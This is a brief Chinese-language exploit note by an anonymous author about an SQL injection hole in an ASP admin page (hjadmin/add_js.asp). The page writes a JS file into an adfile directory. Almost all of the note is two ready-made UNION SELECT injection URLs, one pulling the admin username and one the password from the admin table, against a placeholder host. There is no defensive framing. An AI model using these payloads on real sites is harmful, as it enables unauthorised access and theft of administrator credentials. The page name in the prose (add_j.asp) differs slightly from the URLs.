作者:佚名

漏洞出在 /hjadmin/add_j.asp



在adfile目录下生成一个js 文件。
http://xxx/hjadmin/add_js.asp?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,admin%20from%20admin

http://xxx/hjadmin/add_js.asp?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password%20from%20admin